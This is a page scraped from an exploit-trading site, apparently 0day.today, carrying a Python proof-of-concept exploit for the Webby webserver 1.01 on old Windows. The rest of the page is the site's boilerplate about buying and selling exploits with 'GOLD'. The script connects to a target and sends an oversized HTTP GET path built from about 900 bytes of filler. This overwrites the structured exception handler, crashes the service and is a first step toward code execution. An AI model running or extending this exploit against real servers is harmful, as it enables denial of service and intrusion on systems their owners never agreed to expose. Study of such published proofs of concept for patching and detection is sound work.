0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Webby webserver SEH control (0day) PoC
====================================== Webby webserver SEH control (0day) PoC ====================================== #!/usr/bin/python ##POC details: ## ##SEH overwritten ## ##contact: m1k3@m1k3.at ## http://www.s3cur1ty.de ##App detail: ## #http://www.shareware.de/webby-webserver/ #Version 1.01 #Autor Timo Gaik #Lizenzart Freeware #Plattformen Win XP, Win 98, Win ME #Letztes Update 19.10.2004 #Dateigroesse 701 KB import socket import sys import os.path import time if len(sys.argv) < 2: print "Usage: webby.py <IP-Adr> <port>" sys.exit(0) ips = sys.argv[1] port = int(sys.argv[2]) string = "A"*790 string += "\x90"*4 string += "\x42"*105 method = "GET" print "starting POC for:", ips print "" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: connect=s.connect((ips, port)) except: print "no connection possible" sys.exit(1) payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a' print "\r\nsending payload" print "\n\rusing methode %s with buffersize of: %s" % (method,str(len(string))) print "..." print payload s.send(payload) print "finished kicking method %s with payload %s" % (method,payload) print "... the service should be crashed ... check SEH" # 0day.today [2024-11-15] #